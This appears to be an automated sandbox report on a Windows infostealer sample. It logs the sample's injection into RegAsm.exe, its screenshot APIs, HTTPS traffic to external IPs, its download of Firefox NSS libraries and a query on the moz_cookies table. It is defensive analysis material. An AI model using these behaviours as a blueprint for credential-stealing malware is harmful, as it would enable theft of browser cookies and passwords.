Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.217.244.99:443 -> 192.168.2.6:49701 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00411DF0 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

1_2_00411DF0

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053C0C3	0_2_0053C0C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C031C	0_2_004C031C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0748	0_2_004C0748
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053C79F	0_2_0053C79F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0B62	0_2_004C0B62
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C0FD3	0_2_004C0FD3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C1457	0_2_004C1457
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004994B1	0_2_004994B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004994B1	0_2_004994B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C18C8	0_2_004C18C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047DC82	0_2_0047DC82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DCA8	0_2_0053DCA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0047DC82	0_2_0047DC82
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C1D06	0_2_004C1D06
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D6020	0_2_004D6020
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C2157	0_2_004C2157
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004E245B	0_2_004E245B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004DA4A3	0_2_004DA4A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C2595	0_2_004C2595
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D6690	0_2_004D6690
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004DA4A3	0_2_004DA4A3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F293F	0_2_004F293F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D29FB	0_2_004D29FB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C2ABE	0_2_004C2ABE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D6BD0	0_2_004D6BD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004F6B8F	0_2_004F6B8F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00452CAC	0_2_00452CAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004526DF	0_2_004526DF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00452CAC	0_2_00452CAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004C2FFA	0_2_004C2FFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00452CAC	0_2_00452CAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00452CAC	0_2_00452CAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004E335B	0_2_004E335B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053B621	0_2_0053B621
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004D3790	0_2_004D3790
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053BB72	0_2_0053BB72
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0049FDC8	0_2_0049FDC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004BFF02	0_2_004BFF02
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041D209	1_2_0041D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041E387	1_2_0041E387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041D75A	1_2_0041D75A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_0041F890	1_2_0041F890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C54CF0	1_2_19C54CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CF5940	1_2_19CF5940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C41C9E	1_2_19C41C9E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C42018	1_2_19C42018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D69A20	1_2_19D69A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19DA9CC0	1_2_19DA9CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4292D	1_2_19C4292D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C71C50	1_2_19C71C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C412A8	1_2_19C412A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C42AA9	1_2_19C42AA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D65040	1_2_19D65040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C59000	1_2_19C59000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C43580	1_2_19C43580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CD53B0	1_2_19CD53B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19E1D209	1_2_19E1D209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4D4C0	1_2_19C4D4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19DA9430	1_2_19DA9430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CFD6D0	1_2_19CFD6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CE9690	1_2_19CE9690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4C800	1_2_19C4C800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C41EF1	1_2_19C41EF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D44A60	1_2_19D44A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C68D2A	1_2_19C68D2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C7CE10	1_2_19C7CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CC8120	1_2_19CC8120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CC0090	1_2_19CC0090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D68030	1_2_19D68030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C43AB2	1_2_19C43AB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D80480	1_2_19D80480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C68763	1_2_19C68763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CA4760	1_2_19CA4760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CD8760	1_2_19CD8760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C68680	1_2_19C68680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4251D	1_2_19C4251D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C77810	1_2_19C77810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C6BAB0	1_2_19C6BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4290A	1_2_19C4290A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4F160	1_2_19C4F160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4174E	1_2_19C4174E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C73370	1_2_19C73370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D269C0	1_2_19D269C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D3A940	1_2_19D3A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D5A900	1_2_19D5A900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4481D	1_2_19C4481D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C43E3B	1_2_19C43E3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D7E800	1_2_19D7E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4EA80	1_2_19C4EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4AA40	1_2_19C4AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C419DD	1_2_19C419DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CA2EE0	1_2_19CA2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C86E80	1_2_19C86E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19E1AEBE	1_2_19E1AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C4209F	1_2_19C4209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19CCA0B0	1_2_19CCA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19D3A590	1_2_19D3A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C6A560	1_2_19C6A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C447AF	1_2_19C447AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 1_2_19C566C0	1_2_19C566C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00453143 appears 50 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004522C5 appears 48 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004E5593 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19E206B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C4395E appears 81 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C43AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C41F5A appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C4415B appears 172 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19C41C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004022D0 appears 286 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/27@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_00410B00 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,

1_2_00410B00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 1_2_004110A0 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

1_2_004110A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199677575543[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4092

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\3111af09-48f1-4bec-add3-f56d7b14fdaa

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000001.00000002.2461606471.000000000144A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;M
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: EHIJDHCAKKFCBGCBAAEC.1.dr, IDHIIJJJKEGIDGCBAFIJ.1.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: RegAsm.exe, 00000001.00000002.2466569101.0000000019E58000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.1.dr, softokn3.dll.1.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1135104 > 1048576

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source:	Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
